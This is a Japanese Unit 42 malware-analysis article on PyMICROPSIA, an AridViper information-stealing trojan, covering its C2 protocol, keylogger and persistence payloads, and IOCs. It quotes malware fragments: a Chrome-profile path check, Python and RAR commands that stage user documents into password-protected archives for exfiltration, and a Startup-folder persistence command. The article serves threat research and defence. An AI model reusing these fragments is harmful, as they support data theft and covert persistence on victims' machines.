[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/pymicropsia/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/pymicropsia/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# PyMICROPSIA: AridViperからの新しい情報窃取トロイの木馬

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 6 分で読めます  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/ja/product-category/advanced-dns-security-ja/ "Advanced DNS Security")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Unit 42](https://unit42.paloaltonetworks.com/ja/author/unit42/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2020年12月16日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [AridViper](https://unit42.paloaltonetworks.com/ja/tag/aridviper-ja/)
  * [Information stealer](https://unit42.paloaltonetworks.com/ja/tag/information-stealer-ja/)
  * [MICROPSIA](https://unit42.paloaltonetworks.com/ja/tag/micropsia-ja/)
  * [Trojan](https://unit42.paloaltonetworks.com/ja/tag/trojan-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/pymicropsia/?pdf=download&lg=ja&_wpnonce=4a1c13b7e7 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/pymicropsia/?pdf=print&lg=ja&_wpnonce=4a1c13b7e7 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=PyMICROPSIA:%20AridViperからの新しい情報窃取トロイの木馬&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F&title=PyMICROPSIA:%20AridViperからの新しい情報窃取トロイの木馬 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F&text=PyMICROPSIA:%20AridViperからの新しい情報窃取トロイの木馬 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=PyMICROPSIA:%20AridViperからの新しい情報窃取トロイの木馬%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fpymicropsia%2F "Share in Mastodon")

## 概要

パロアルトネットワークス脅威インテリジェンスリサーチチームUnit 42は、中東地域を標的とする脅威グループAridViperを追跡してきました。このリサーチ中、[MICROPSIA](https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/#:~:text=We%20named%20the%20second%20new,malicious%20updates%20a%20secure%20updates.)マルウェアファミリと関連している新たな情報窃取型トロイの木馬が特定されました。このことは、攻撃者が活発な開発プロファイルを維持し、標的の防御をかいくぐろうとする新しいインプラントを作成しているということを示しています。この新しいマルウェアファミリはPythonで作成されていることから、弊社ではこれをPyMICROPSIAと名付けました。

以下の図1は、PyMICROPSIAマルウェアファミリの機能の概要と以前のAridViperのアクティビティで観測された類似事項を示しています。PyMICROPSIAの機能の調査中に、攻撃者のインフラストラクチャでホストされている2つのサンプルを新たに特定しました。PyMICROPSIAはそのデプロイ中に、これらのサンプルをダウンロードし、使用します。この2つのサンプルは、後で述べる永続化とキーロギングの機能を提供します。
![PyMICROPSIAの主な機能としては、ファイルのアップロード、ペイロードのドロップと実行、ブラウザの認証情報窃取、スクリーンショット、キーロギング、ローカルマシン情報の収集、ファイルの管理と流出、Outlook情報の収集、音声のレコーディング、およびコマンドの実行があります。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-182.png) 図1.PyMICROPSIAの概要

本稿では、PyMICROPSIAの機能と目的を詳述し、そのコマンド アンド コントロール(C2)の実装を分析します。また、以前のAridViperのアクティビティがPyMICROPSIAに起因することを示唆した主な観測結果も取り上げます。

パロアルトネットワークスの[次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)をご使用のお客様は、[WildFire](https://www.paloaltonetworks.jp/products/secure-the-network/wildfire)、[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)、および[DNS Security](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/dns-security)のサブスクリプションによって、本稿に記載されている攻撃から防御されています。また、[AutoFocus](https://www.paloaltonetworks.jp/cortex/autofocus)および[Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)によっても防御されています。

## PyMICROPSIAの分析

PyMICROPSIAには、以下を含むさまざまな情報窃取およびコントロールの機能があります。

* ファイルのアップロード。
* ペイロードのダウンロードと実行。
* ブラウザの認証情報の窃取。ブラウザ履歴およびプロファイルのクリア。
* スクリーンショットの取得。
* キーロギング。
* 窃取した情報をRARファイルに圧縮。
* プロセス情報の収集とプロセスの強制終了。
* ファイルリスト情報の収集。
* ファイルの削除。
* マシンのリブート。
* Outlook .ostファイルの収集。Outlookプロセスの強制終了と無効化。
* ファイルとフォルダの削除、作成、圧縮、および流出。
* ファイルの流出など、USBドライブからの情報の収集。
* 音声レコーディング。
* コマンドの実行。

#### **実装の概要**

PyMICROPSIAは、Pythonで作成され、[PyInstaller](https://www.pyinstaller.org/)を使用してWindows実行可能ファイル化した情報窃取トロイの木馬です。
![PyMICROPSIAは、Pythonで作成された情報窃取トロイの木馬であり、PyInstallerを使用してWindows実行可能ファイル化されています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-183.png) 図2.PyMICROPSIA内のPyInstaller文字列

その主な機能は、さまざまなスレッドを初期化して複数のタスクを定期的に呼び出すループを実行することで実装されています。その目的は、情報の収集とC2オペレータとのやり取りです。
![PyMICROPSIAの主な機能は、ここに示すように、さまざまなスレッドを初期化して複数のタスクを定期的に呼び出すループを実行することで実装されています。その目的は、情報の収集とC2オペレータとのやり取りです。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-184.png) 図3.メイン コード ループ

攻撃者は、組み込みPythonライブラリと特定のパッケージの両方を含む複数の興味深いPythonライブラリを利用してその目的を達成しています。以下は、情報窃取固有のライブラリの例です。

* [PyAudio](https://pypi.org/project/PyAudio/): 情報窃取機能用。
* [mss](https://pypi.org/project/mss/): スクリーンショット機能用。

![PyMICROPSIAは、ここに示すように、音声窃取機能用にPyAudioライブラリを使用します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-185.png) 図4.音声レコーディング用PyAudioライブラリ ![PyMICROPSIAは、ここに示すように、スクリーンショット取得用にmssライブラリを使用します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-186.png) 図5.スクリーンショット用mssライブラリ

Windows[プロセス](https://docs.python.org/3/library/subprocess.html)、[Windowsレジストリ](https://docs.python.org/3/library/winreg.html)、ネットワーキング、ファイルシステムの操作など複数の目的で、Python組み込みライブラリの使用が想定されています。
![ここに示すように、Windowsレジストリの操作のために、Python組み込みライブラリの使用が想定されています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-187.png) 図6.Windowsレジストリの操作 ![ここに示すように、Windowsプロセスの操作のために、Python組み込みライブラリの使用が想定されています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-188.png) 図7.Windowsプロセスの操作

Windowsオペレーティングシステムのその他の特定の操作については、以下のようなライブラリが使用されています。

* [WMI](https://pypi.org/project/WMI/): Windows Management Instrumentationの操作用。
* [win32security](https://timgolden.me.uk/pywin32-docs/win32security.html)および[ntsecuritycon](https://github.com/saltstack/salt-windows-install/blob/master/deps/salt/python/App/Lib/site-packages/win32/lib/ntsecuritycon.py): win32security APIの操作用。

![PyMICROPSIAは、Windows Management Instrumentationの操作のためにWMIライブラリを利用します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-189.png) 図8.USBの操作のためのWMIの使用 ![PyMICROPSIAは、win32security APIの操作のためにwin32securityおよびntsecurityconライブラリを利用します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-190.png) 図9. win32securityとntsecurityconの使用

PyMICROPSIAのコードと機能の詳細な分析については、「参考情報」を参照してください。

#### **コマンド\&コントロール**

PyMICROPSIAは、単純なHTTP POSTベースのC2プロトコルを実装し、呼び出す機能に応じて通信中にさまざまなuniform resource identifier (ユニフォームリソース識別子 - URI)パスおよび変数を使用します(実装の詳細については、「参考情報」を参照してください)。

次の表は、PyMICROPSIAにおけるURIパスと対応する機能の概要を示しています。

|----------------------------------|---------------|
| **パス**                           | **メソッド**      |
| /zoailloaze/sfuxmiibif/samantha  | 要求の削除。登録解除。   |
| /zoailloaze/sfuxmiibif/lashawna  | デバイスの登録。      |
| /zoailloaze/sfuxmiibif/matheny   | コマンド出力データの送信。 |
| /zoailloaze/sfuxmiibif/uiasfvz   | USBデバイス情報     |
| /zoailloaze/sfuxmiibif/daryl     | 要求の削除。        |
| /zoailloaze/sfuxmiibif/qprbudls  | ペイロードのダウンロード。 |
| /zoailloaze/sfuxmiibif/nyrvoz    | ダウンロードURL。    |
| /zoailloaze/sfuxmiibif/hortense1 | ファイルのアップロード。  |

^*表1 設定フォルダおよびファイルの主な目的*^

同じく重要な点は、分析したPyMICROPSIAサンプルには、C2関連コードで、応答の処理時に実行されないコード分岐が複数あることです。これは、攻撃者が依然としてアクティブにこのコードに取り組んでいる可能性を示唆しています。次の表に、到達可能なコードセクションに基づいて、標的のマシンで実行されるコマンドとアクションの概要を示します。

|------------|---------------------------------|
| **コマンド**   | **アクション**                       |
| Lee        | 新しいデバイスの登録。                     |
| Renee      | デバイスの削除。                        |
| Rapunzel   | ブラウザの認証情報を窃取してC2にアップロード。        |
| Mulan      | プロセスリストの収集とアップロード。              |
| Silverman  | TXT形式でのファイル情報の収集とアップロード。        |
| Eeyore     | Firefoxのプロファイルの削除とデバイスの登録解除。    |
| Pocahontas | JSON詳細形式での圧縮済みファイル情報の収集とアップロード。 |
| InfoCinder | システム内のドライブに関する情報の収集とアップロード。     |

^*表2 到達可能なC2コマンドとアクション*^

#### **AridViperは新しい攻撃ベクトルに取り組んでいるか?**

PyMICROPSIAは、Windowsオペレーティングシステムのみを標的とするように設計されていますが、コードには、"posix"や"darwin"など他のオペレーティングシステムかどうかをチェックする興味深いスニペットが含まれています。これは興味深い発見です。これまでこれらのオペレーティングシステムを標的とするAridViperを発見したことがなく、これは攻撃者が探察を開始しようとしている新しい領域を表している可能性があります。  
Python  
else: if os.name == 'posix' and sys.platform == 'darwin': PathName = os.getenv('HOME') + '/Library/Application Support/Google/Chrome/Default/' if os.path.isdir(PathName) == False: sys.exit(0) elif os.name == 'posix': PathName = os.getenv('HOME') + '/.config/google-chrome/Default/' if os.path.isdir(PathName) == False: sys.exit(0) return PathName

|----------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 | else: if os.name == 'posix' and sys.platform == 'darwin': PathName = os.getenv('HOME') + '/Library/Application Support/Google/Chrome/Default/' if os.path.isdir(PathName) == False: sys.exit(0) elif os.name == 'posix': PathName = os.getenv('HOME') + '/.config/google-chrome/Default/' if os.path.isdir(PathName) == False: sys.exit(0) return PathName |

現時点では、発見されたコードは単純で、Pythonコードの作成時にコピー アンド ペーストした一部の可能性もありますが、いずれにしても弊社は新たなアクティビティのリサーチでこれを監視していく予定です。

#### **追加のペイロード**

C2とのやり取り中に、PyMICROPSIAは2つの追加のサンプルをダウンロードし、標的のシステムにドロップして実行し、追加の機能を実行します。これらのペイロードはPythonおよびPyInstallerをベースにしていません。

###### **キーロガー機能**

これはキーロギング機能がPyMICROPSIAの一部としてネイティブに実装されていない興味深いケースです。代わりに、このサンプルは特定のペイロードをダウンロードします(ペイロードのダウンロード方法については、「参考情報」の「ファイルのダウンロード機能」のセクションを参照してください)。

このペイロードはファイル名"MetroIntelGenericUIFram.exe"でダウンロードされ、以下のSHA-256を持っています。

381b1efca980dd744cb8d36ad44783a35d01a321593a4f39a0cdae9c7eeac52f

このサンプルは以下の[GetAsyncKeyState](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate) APIメソッドを使用してキーロギング機能を実装します。
![PyMICROPSIAのサンプルはネイティブでキーロギング機能を実装しません。その代わりに、GetAsyncKeyState APIメソッドを使用してそれらの機能を実装します。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-191.png) 図10.キーロガーGetAsyncKey()コード

これには、メインのPyMICROPSIAサンプルによって初期化されるディレクトリ構造に直接関係するハードコードされた設定があるため、それに従ったコンパイルが必要です。これは、PyMICROPSIAによって作成される特定のディレクトリ("ModelsControllerLibb")の下で実行する必要があり、"HPFusionManagerDell"フォルダの下にキーストローク情報を格納します。
![ハードコードされた設定パラメータには、キーストローク情報の格納先であるHPFusionManagerDellフォルダが含まれています。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-192.png) 図11.ハードコードされた設定パラメータ

キーロガーは情報をHPFusionManagerDellディレクトリに、以下のファイル名構造と形式でドロップします。
![キーロガーは情報をHPFusionManagerDellディレクトリに、ここに示すファイル名構造でドロップします。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-193.png) 図12.キーロガーの出力ファイル形式 ![キーロガーは情報をHPFusionManagerDellディレクトリに、ここに示す形式でドロップします。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-194.png) 図13.キーロガーのファイルコンテンツ構造

##### **永続化**

このマルウェアサンプルの永続化は、以下のようにPythonコードの一部として実行されるレジストリキーの設定など、通常のメソッドで実現可能です。
![このマルウェアサンプルの永続化はレジストリキーの設定によって実現可能であり、ここに示すPythonコードの一部として実行されます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-195.png) 図14.レジストリキーの永続化

ただし、この実装における永続化に関して興味深いことがあります。このサンプルは、C2サーバーから別のペイロードをダウンロードします(詳細については、「ファイルのダウンロード機能」のセクションを参照してください)。このペイロードの名前は"SynLocSynMomentum.exe"で、以下のSHA-256を持っています。

9c32fdf5af8b86049abd92561b3d281cb9aebf57d2dfef8cc2da59df82dca753

このサンプルは以下の特定のパラメータで実行されます。

SynLocSynMomentum.exe ModelsControllerLibb ModelsControllerLib

これはスタートアップメニューにコピーされるショートカット.lnkによって永続化を設定します。特筆すべき点は、このコードが、Pythonコードに既に存在している機能の量を考慮して、別のペイロードとして実行されることです。  
MS DOS  
"C:\\Windows\\System32\\cmd.exe" /c move "C:\\Users\\admin\\AppData\\Local\\Temp\\\\ModelsControllerLib.lnk" "C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ModelsControllerLib.lnk"

|---|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | "C:\\Windows\\System32\\cmd.exe" /c move "C:\\Users\\admin\\AppData\\Local\\Temp\\\\ModelsControllerLib.lnk" "C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ModelsControllerLib.lnk" |

## 他のMICROPSIAアクティビティとの関係

弊社は、中東地域に関連した最近のMICROPSIAのアクティビティを調査中に、PyMICROPSIAを発見しました。そのマルウェアには以下の例などそのアクティビティをAridViperに関連付ける複数の側面が存在しています。

#### **コードの重複**

このサンプルについて最初に注目した点は、そのC2の実装と機能が既知のMICROPSIAサンプルによく似ていることです。例については、[Radware](https://blog.radware.com/security/2018/07/micropsia-malware/)および[Check Point](https://research.checkpoint.com/2018/apt-attack-middle-east-big-bang/)による以前のリサーチでのC2の説明を参照してください。

また、MICROPSIAの各サンプルにわたって観測された戦術、手法、手順(TTP)は、流出用データの圧縮にrar.exeが使用されていたことです。このバージョンでは、rar.exeはC2インフラストラクチャからダウンロードされ、以前のサンプルで観測されたものとよく似たパラメータで使用されています。  
Python  
k24 = '"' + Wv + '\\\\\*.dot' + '" ' k25 = '"' + Wv + '\\\\\*.dotx' + '" ' AllFile = k1 + k2 + k3 + k4 + k5 + k6 + k7 + k8 + k9 + k11 + k12 + k13 + k14 + k15 + k16 + k17 + k18 + k19 + k20 + k21 + k22 + k23 + k24 + k25 AllFiles\_Drvi = AllFile flTDType = AllFiles\_Drvi te = file\_D En\_crpypt2 = 'a -r -ep1 -v2.5m -ta' + te + ' -hp' En = '4545933464930447517744759' mm = chick\_Device\_Name() + En nnWithoutdel = En\_crpypt2 + mm subprocess.call('"' + Rar\_File + '"' + ' ' + (nnWithoutdel + ' ' + '"' + Zip\_File2 + '\_NETWORKWTHDate"' + ' ' + flTDType), shell=True)

|-------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 | k24 = '"' + Wv + '\\\\\*.dot' + '" ' k25 = '"' + Wv + '\\\\\*.dotx' + '" ' AllFile = k1 + k2 + k3 + k4 + k5 + k6 + k7 + k8 + k9 + k11 + k12 + k13 + k14 + k15 + k16 + k17 + k18 + k19 + k20 + k21 + k22 + k23 + k24 + k25 AllFiles\_Drvi = AllFile flTDType = AllFiles\_Drvi te = file\_D En\_crpypt2 = 'a -r -ep1 -v2.5m -ta' + te + ' -hp' En = '4545933464930447517744759' mm = chick\_Device\_Name() + En nnWithoutdel = En\_crpypt2 + mm subprocess.call('"' + Rar\_File + '"' + ' ' + (nnWithoutdel + ' ' + '"' + Zip\_File2 + '\_NETWORKWTHDate"' + ' ' + flTDType), shell=True) |

例については、MICROPSIAの最新のサンプルでのrar.exeの使用方法を参照してください。

SHA-256: 3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac  
MS DOS  
"C:\\Program Files\\WinRAR\\Rar.exe" a -r -ep1 -v2500k -hpcec6b597e046386f74b807c60ada61a5\_d01247a1eaf1c24ffbc851e883e67f9b -ta2020-10-21 "C:\\ProgramData\\commonlogfiles\\LMth\_C" "C:\\Users\\admin\\\*.xls" "C:\\Users\\admin\\\*.xlsx" "C:\\Users\\admin\\\*.doc" "C:\\Users\\admin\\\*.docx" "C:\\Users\\admin\\\*.csv" "C:\\Users\\admin\\\*.pdf" "C:\\Users\\admin\\\*.ppt" "C:\\Users\\admin\\\*.pptx" "C:\\Users\\admin\\\*.odt" "C:\\Users\\admin\\\*.mdb" "C:\\Users\\admin\\\*.accdb" "C:\\Users\\admin\\\*.accde" "C:\\Users\\admin\\\*.txt" "C:\\Users\\admin\\\*.rtf"

|---|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | "C:\\Program Files\\WinRAR\\Rar.exe" a -r -ep1 -v2500k -hpcec6b597e046386f74b807c60ada61a5\_d01247a1eaf1c24ffbc851e883e67f9b -ta2020-10-21 "C:\\ProgramData\\commonlogfiles\\LMth\_C" "C:\\Users\\admin\\\*.xls" "C:\\Users\\admin\\\*.xlsx" "C:\\Users\\admin\\\*.doc" "C:\\Users\\admin\\\*.docx" "C:\\Users\\admin\\\*.csv" "C:\\Users\\admin\\\*.pdf" "C:\\Users\\admin\\\*.ppt" "C:\\Users\\admin\\\*.pptx" "C:\\Users\\admin\\\*.odt" "C:\\Users\\admin\\\*.mdb" "C:\\Users\\admin\\\*.accdb" "C:\\Users\\admin\\\*.accde" "C:\\Users\\admin\\\*.txt" "C:\\Users\\admin\\\*.rtf" |

#### **C2通信の類似性**

複数のMICROPSIAサンプルで観測されたURIパス構造は、PyMICROPSIAサンプルのものと似ています。たとえば、同じ最近のMICROPSIAサンプルを調べると、URIパスのランダムな文字と構造を観測できます。

SHA-256:  
3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac

hxxps://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/rxkwjt  
hxxps://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/zxfsyadoss/gM69sY  
hxxp://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/tpmpyyzwg  
hxxps://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/ouwmhf/ImoOEJ  
hxxp://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/ouwmhf/voT8FY  
hxxp://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/rxkwjt  
hxxp://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/zxfsyadoss/TocLI5  
hxxps://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/ouwmhf/9WnKfe  
hxxp://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/zxfsyadoss/pyPaqj  
hxxps://jaime-martinez\[.\]info/sujqbrgpb/bztjpskd/ouwmhf/HRabCX

#### **使用されるテーマ**

過去には、MICROPSIAのコードおよびC2の実装では[The Big Bang Theory](https://research.checkpoint.com/2018/apt-attack-middle-east-big-bang/)や[Game of Thrones](https://blog.talosintelligence.com/2017/06/palestine-delphi.html)など特定のテーマの言及がみられましたが、この新しい実装も同様で、図15および16のように複数の有名俳優の名前の言及がコード変数および使用しているインフラストラクチャの両方に複数含まれています。
![MICROPSIAは、コードにThe Big Bang TheoryやGame of Thronesなどテーマの言及があることが知られています。上記の俳優Fran Drescherの言及は、以前観測されたテーマの言及と同様と思われます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-196.png) 図15.MICROPSIAは、コードにThe Big Bang TheoryやGame of Thronesなどテーマの言及があることが知られています。上記の俳優Fran Drescherの言及は、以前観測されたテーマの言及と同様と思われます。 ![MICROPSIAは、コードにThe Big Bang TheoryやGame of Thronesなどテーマの言及があることが知られています。上記の俳優Keanu Reevesの言及は、以前観測されたテーマの言及と同様と思われます。](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-197.png) 図16.MICROPSIAは、コードにThe Big Bang TheoryやGame of Thronesなどテーマの言及があることが知られています。上記の俳優Keanu Reevesの言及は、以前観測されたテーマの言及と同様と思われます。

また、「コマンド アンド コントロール」セクションで説明したように、C2活動には多数のDisneyの言及が含まれています。

もう1つ興味深いのは、コード内にアラビア語のコメントが存在することです。  
Python  
Delete\_Request\_Error('لم يتم ضغط هذا الملف!!..')

|---|--------------------------------------------------|
| 1 | Delete\_Request\_Error('لم يتم ضغط هذا الملف!!..') |

これは、偽フラグの可能性がありますが、このマルウェアサンプルの地域属性に関係している可能性もあります。

## 結論

AridViperは、武器の一部として新しいツールの開発を続けているアクティブな脅威グループです。PyMICROPSIAについては、MICROPSIAなど他の既存のAridViperツールとの複数の類似点が観測されています。また、弊社が分析したPyMICROPSIAのさまざまな側面に基づくと、このマルウェアにはまだ使用されていない複数のセクションがあります。これは、この攻撃者がアクティブに開発中のマルウェアファミリである可能性が高いことを示しています。

パロアルトネットワークスのお客様は、次の方法で本稿で概説した攻撃から保護されています。

* MICROPSIAとPyMICROPSIAを含むすべての基地のAridViperツールは、WildFireでは悪意があると判定されています。
* AutoFocusをご使用のお客様は、AridViperの攻撃者とそのツールを追跡できます。
* Cortex XDRは、PyMICROPSIAとそれがドロップするペイロードの両方をブロックできます。
* C2ドメインは、URLフィルタリングとDNS Securityでコマンド アンド コントロールと分類されています。

## IoC

#### **PyMICROPSIAのサンプル**

11487246a864ee0edf2c05c5f1489558632fb05536d6a599558853640df8cd78

ddaeffb12a944a5f4d47b28affe97c1bc3a613dab32e5b5b426ef249cfc29273

46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531

#### **MICROPSIAのサンプル**

47d53f4ab24632bf4ca34e9a10e11b4b6c48a242cbcfcb1579d67523463e59d2

83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b

eab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac

078212fc6d69641e96ed04352fba4d028fd5eadc87c7a4169bfbcfc52b8ef8f2

0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd

2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c

26253e9027f798bafc4a70bef1b5062f096a72b0d7af3065b0f4a9b3be937c99

3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4

3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac

3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4

42fa99e574b8ac5eddf084a37ef891ee4d16742ace9037cda3cdf037678e7512

4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986

5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17

82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950

a60cadbf6f5ef8a2cbb699b6d7f072245c8b697bbad5c8639bca9bb55f57ae65

b0562b41552a2fa744390a5f79a843940dade57fcf90cd23187d9c757dc32c37

b61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44

d28ab0b04dc32f1924f1e50a5cf864325c901e11828200629687cca8ce6b2d5a

db1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a

e869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6

eda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768

**AridViper Infrastructure**

baldwin-gonzalez\[.\]live

jaime-martinez\[.\]info

judystevenson\[.\]info

robert-keegan\[.\]life

benyallen\[.\]club

chad-jessie\[.\]info

escanor\[.\]live

krasil-anthony\[.\]icu

nicoledotson\[.\]icu

samwinchester\[.\]club

tatsumifoughtogre\[.\]club

## 参考情報: PyMYCROPSIAマルウェア分析

以下のPyMICROPSIAの分析は、以下のサンプルに基づいています。

